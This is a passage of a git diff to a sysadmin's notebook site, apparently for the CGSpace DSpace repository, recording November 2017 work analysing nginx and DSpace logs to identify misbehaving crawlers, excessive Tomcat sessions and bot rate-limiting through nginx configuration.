    # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
    +
    # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
         496 62.210.247.93
         571 46.4.94.226
         651 40.77.167.39
    @@ -371,9 +371,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
     
  • 190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine
  • Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don’t reuse their session variable, creating thousands of new sessions!
  • -
    # grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    # grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     1419
    -# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2811
     
    • From looking at the requests, it appears these are from CIAT and CCAFS
    • @@ -382,11 +382,11 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
    • Ah, wait, it looks like crawlerIps only came in 2017-06, so probably isn’t in Ubuntu 16.04’s 7.0.68 build!
    • That would explain the errors I was getting when trying to set it:
    -
    WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
    +
    WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
     
    • As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:
    -
    # grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
    +
    # grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
         410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
         574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
        1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
    @@ -399,7 +399,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
     
  • Ask on the dspace-tech mailing list if it’s possible to use an existing item as a template for a new item
  • To follow up on the CORE bot traffic, there were almost 300,000 requests yesterday:
  • -
    # grep "CORE/0.6" /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
    +
    # grep "CORE/0.6" /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
      139109 137.108.70.6
      139253 137.108.70.7
     
      @@ -416,7 +416,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
    • I’m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable
    • Actually, come to think of it, they aren’t even obeying robots.txt, because we actually disallow /discover and /search-filter URLs but they are hitting those massively:
    -
    # grep "CORE/0.6" /var/log/nginx/access.log | grep -o -E "GET /(discover|search-filter)" | sort -n | uniq -c | sort -rn 
    +
    # grep "CORE/0.6" /var/log/nginx/access.log | grep -o -E "GET /(discover|search-filter)" | sort -n | uniq -c | sort -rn 
      158058 GET /discover
       14260 GET /search-filter
     
      diff --git a/docs/2017-11/index.html b/docs/2017-11/index.html
      index a771a36c3..c5a96cb20 100644
      --- a/docs/2017-11/index.html
      +++ b/docs/2017-11/index.html
      @@ -15,7 +15,7 @@ The CORE developers responded to say they are looking into their bot not respect
       Today there have been no hits by CORE and no alerts from Linode (coincidence?)
      -# grep -c "CORE" /var/log/nginx/access.log
      +# grep -c "CORE" /var/log/nginx/access.log
       0
       Generate list of authors on CGSpace for Peter to go through and correct:
      @@ -40,7 +40,7 @@ The CORE developers responded to say they are looking into their bot not respect
       Today there have been no hits by CORE and no alerts from Linode (coincidence?)
      -# grep -c "CORE" /var/log/nginx/access.log
      +# grep -c "CORE" /var/log/nginx/access.log
       0
       Generate list of authors on CGSpace for Peter to go through and correct:
      @@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct:
       dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
       COPY 54701
       "/>
      -
      +
      @@ -142,12 +142,12 @@ COPY 54701
      • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
      -
      # grep -c "CORE" /var/log/nginx/access.log
      +
      # grep -c "CORE" /var/log/nginx/access.log
       0
       
      • Generate list of authors on CGSpace for Peter to go through and correct:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
      +
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
       COPY 54701
       
      • Abenet asked if it would be possible to generate a report of items in Listing and Reports that had “International Fund for Agricultural Development” as the only investor
      • @@ -155,7 +155,7 @@ COPY 54701
      • Work on making the thumbnails in the item view clickable
      • Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link
      -
      //mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
      +
      //mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
       
      • METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml
      • I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!
      • @@ -177,7 +177,7 @@ COPY 54701
      • It’s the first time in a few days that this has happened
      • I had a look to see what was going on, but it isn’t the CORE bot:
      -
      # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
      +
      # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
           306 68.180.229.31
           323 61.148.244.116
           414 66.249.66.91
      @@ -216,7 +216,7 @@ COPY 54701
       
      • But in the database the authors are correct (none with weird , / characters):
      -
      dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
      +
      dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
                        text_value                 |              authority               | confidence 
       --------------------------------------------+--------------------------------------+------------
        International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |          0
      @@ -240,7 +240,7 @@ COPY 54701
       
    • Tsega had to restart Tomcat 7 to fix it temporarily
    • I will start by looking at bot usage (access.log.1 includes usage until 6AM today):
    -
    # cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         619 65.49.68.184
         840 65.49.68.199
         924 66.249.66.91
    @@ -268,11 +268,11 @@ COPY 54701
     
    • This user is responsible for hundreds and sometimes thousands of Tomcat sessions:
    -
    $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     954
    -$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     6199
    -$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     7051
     
    • The worst thing is that this user never specifies a user agent string so we can’t lump it in with the other bots using the Tomcat Crawler Session Manager Valve
    • @@ -280,7 +280,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    # grep -c 104.196.152.243 /var/log/nginx/access.log.1
     4681
    -# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
    +# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
     4618
     
    • I just realized that ciat.cgiar.org points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior
    • @@ -288,44 +288,44 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    $ grep -c 207.46.13.36 /var/log/nginx/access.log.1 
     2034
    -# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:
    -
    # grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +
    # grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like “/discover”:
    -
    # grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 
    +
    # grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 
     5997
    -# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "bingbot"
    +# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "bingbot"
     5988
    -# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like “/discover”:
    -
    # grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 
    +
    # grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 
     3048
    -# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
    +# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
     3048
    -# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like “/discover”:
    # grep -c 68.180.229.254 /var/log/nginx/access.log.1 
     1131
    -# grep  68.180.229.254 /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep  68.180.229.254 /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:
    -
    # grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 
    +
    # grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 
     2950
    -# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
     330
     
    • Their user agents vary, ie:
    @@ -338,9 +338,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    • I’ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs
    • While it’s not in the top ten, Baidu is one bot that seems to not give a fuck:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep -c Baiduspider
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep -c Baiduspider
     8912
    -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep Baiduspider | grep -c -E "GET /(browse|discover|search-filter)"
    +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep Baiduspider | grep -c -E "GET /(browse|discover|search-filter)"
     2521
     
    • According to their documentation their bot respects robots.txt, but I don’t see this being the case
    • @@ -349,7 +349,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    • I should look in nginx access.log, rest.log, oai.log, and DSpace’s dspace.log.2017-11-07
    • Here are the top IPs making requests to XMLUI from 2 to 8 AM:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         279 66.249.66.91
         373 65.49.68.199
         446 68.180.229.254
    @@ -364,7 +364,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
  • Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot
  • Here are the top IPs making requests to REST from 2 to 8 AM:
  • -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           8 207.241.229.237
          10 66.249.66.90
          16 104.196.152.243
    @@ -377,14 +377,14 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
    • The OAI requests during that same time period are nothing to worry about:
    -
    # cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           1 66.249.66.92
           4 66.249.66.90
           6 68.180.229.254
     
    • The top IPs from dspace.log during the 2–8 AM period:
    -
    $ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
    +
    $ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
         143 ip_addr=213.55.99.121
         181 ip_addr=66.249.66.91
         223 ip_addr=157.55.39.161
    @@ -414,9 +414,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
    • The whois data shows the IP is from China, but the user agent doesn’t really give any clues:
    -
    # grep 124.17.34.59 /var/log/nginx/access.log | awk -F'" ' '{print $3}' | sort | uniq -c | sort -h
    -    210 "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
    -  22610 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)"
    +
    # grep 124.17.34.59 /var/log/nginx/access.log | awk -F'" ' '{print $3}' | sort | uniq -c | sort -h
    +    210 "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
    +  22610 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)"
     
    • A Google search for “LCTE bot” doesn’t return anything interesting, but this Stack Overflow discussion references the lack of information
    • So basically after a few hours of looking at the log files I am not closer to understanding what is going on!
    • @@ -424,7 +424,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    • And as we speak Linode alerted that the outbound traffic rate has been very high for the past two hours (from about 12:00 to 14:00)
    • At least for now it seems to be that new Chinese IP (124.17.34.59):
    -
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         198 207.46.13.103
         203 207.46.13.80
         205 207.46.13.36
    @@ -438,17 +438,17 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
    • Seems 124.17.34.59 is really downloading all our PDFs, compared to the next most active IPs during this time!
    -
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
    +
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
     5948
    -# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
    +# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
     0
     
    • About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reusing their Tomcat session and they are creating thousands of sessions per day
    • All CIAT requests vs unique ones:
    -
    $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
    +
    $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
     3506
    -$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
    +$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
     3506
     
    • I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API
    • @@ -459,18 +459,18 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
      • But they literally just made this request today:
      -
      180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] "GET /discover?filtertype_0=crpsubject&filter_relational_operator_0=equals&filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&filtertype=subject&filter_relational_operator=equals&filter=WATER+RESOURCES HTTP/1.1" 200 82265 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
      +
      180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] "GET /discover?filtertype_0=crpsubject&filter_relational_operator_0=equals&filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&filtertype=subject&filter_relational_operator=equals&filter=WATER+RESOURCES HTTP/1.1" 200 82265 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
       
      • Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:
      # grep -c Baiduspider /var/log/nginx/access.log
       3806
      -# grep Baiduspider /var/log/nginx/access.log | grep -c -E "GET /(browse|discover|search-filter)"
      +# grep Baiduspider /var/log/nginx/access.log | grep -c -E "GET /(browse|discover|search-filter)"
       1085
       
      • I will think about blocking their IPs but they have 164 of them!
      -
      # grep "Baiduspider/2.0" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
      +
      # grep "Baiduspider/2.0" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
       164
       

      2017-11-08

        @@ -478,12 +478,12 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
      • Linode sent another alert about CPU usage in the morning at 6:12AM
      • Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:
      -
      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "0[78]/Nov/2017:" | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
      +
      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "0[78]/Nov/2017:" | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
       24981
       
      • This is about 20,000 Tomcat sessions:
      -
      $ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
      +
      $ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
       20733
       
      • I’m getting really sick of this
      • @@ -498,7 +498,7 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
      map $remote_addr $ua {
           # 2017-11-08 Random Chinese host grabbing 20,000 PDFs
      -    124.17.34.59     'ChineseBot';
      +    124.17.34.59     'ChineseBot';
           default          $http_user_agent;
       }
       
        @@ -516,9 +516,9 @@ proxy_set_header User-Agent $ua;
      • I merged the clickable thumbnails code to 5_x-prod (#347) and will deploy it later along with the new bot mapping stuff (and re-run the Ansible nginx and tomcat tags)
      • I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in robots.txt:
      -
      # zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
      +
      # zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
       22229
      -# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
      +# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
       0
       
      • It seems that they rarely even bother checking robots.txt, but Google does multiple times per day!
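The robots.txt comparison above can be repeated for any crawler with a small wrapper. This is a sketch under assumptions: the function name `count_disallowed_hits` is hypothetical, the path list (`/browse`, `/discover`, `/search-filter`) is taken from the commands in these notes rather than read from the live robots.txt, and the log files are assumed to be uncompressed.

```shell
#!/bin/sh
# Hypothetical helper (not part of nginx or of the original notes).
# Counts requests from a given user agent to paths that the notes say
# are disallowed in robots.txt.
#   $1:   fixed string identifying the bot, e.g. Baiduspider
#   $2..: one or more uncompressed nginx access logs
count_disallowed_hits() {
    agent=$1
    shift
    # grep -c prints 0 but exits non-zero when nothing matches;
    # "|| true" keeps the function's exit status clean in that case.
    cat -- "$@" \
        | grep -F -- "$agent" \
        | grep -c -E '"GET /(browse|discover|search-filter)' \
        || true
}

# Example calls (paths assume the nginx log layout used above):
# count_disallowed_hits Baiduspider /var/log/nginx/access.log /var/log/nginx/access.log.1
# count_disallowed_hits Googlebot /var/log/nginx/access.log /var/log/nginx/access.log.1
```

To include rotated `.gz` logs as well, swapping `cat --` for `zcat -f --` (as used elsewhere in these notes) should work on systems with GNU gzip.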
      • @@ -538,20 +538,20 @@ proxy_set_header User-Agent $ua;
        • Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:
        -
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
        +
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
         8956
        -$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
        +$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
         223
         
        • Versus the same stats for yesterday and the day before:
        -
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243 
        +
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243 
         10216
        -$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
        +$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
         2592
        -# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
        +# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
         8120
        -$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
        +$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
         3506
         
        • The number of sessions is more than ten times lower!
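Because the request totals differ from day to day, it can help to normalize sessions by requests before comparing. The following is a small worked calculation using only the figures quoted above; the helper name `sessions_per_request` is hypothetical.

```shell
#!/bin/sh
# Hypothetical helper: unique sessions divided by total requests,
# printed to three decimal places.
sessions_per_request() {
    awk -v s="$1" -v r="$2" 'BEGIN {
        if (r == 0) exit 1      # avoid dividing by zero
        printf "%.3f\n", s / r
    }'
}

sessions_per_request 223 8956     # 2017-11-09, prints 0.025
sessions_per_request 2592 10216   # 2017-11-08, prints 0.254
sessions_per_request 3506 8120    # 2017-11-07, prints 0.432
```

By this measure the CIAT scraper went from roughly one new session for every two to four requests down to about one for every forty.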
        • @@ -569,7 +569,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
        • Update the Ansible infrastructure templates to be a little more modular and flexible
        • Looking at the top client IPs on CGSpace so far this morning, even though it’s only been eight hours:
        -
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "12/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
        +
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "12/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
             243 5.83.120.111
             335 40.77.167.103
             424 66.249.66.91
        @@ -584,21 +584,21 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
         
      • 5.9.6.51 seems to be a Russian bot:
      # grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
      -5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] "GET /handle/10568/16515/recent-submissions HTTP/1.1" 200 5097 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
      +5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] "GET /handle/10568/16515/recent-submissions HTTP/1.1" 200 5097 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
       
      • What’s amazing is that it seems to reuse its Java session across all requests:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
       1558
      -$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       1
       
      • Bravo to MegaIndex.ru!
      • The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat’s Crawler Session Manager valve regex should match ‘YandexBot’:
      # grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
      -95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] "GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1" 200 972019 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
      -$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
      +95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] "GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1" 200 972019 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
      +$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
       991
       
      • Move some items and collections on CGSpace for Peter Ballantyne, running move_collections.sh with the following configuration:
      • @@ -612,7 +612,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-
      • The solution I came up with uses tricks from both of those
      • I deployed the limit on CGSpace and DSpace Test and it seems to work well:
      -
      $ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
      +
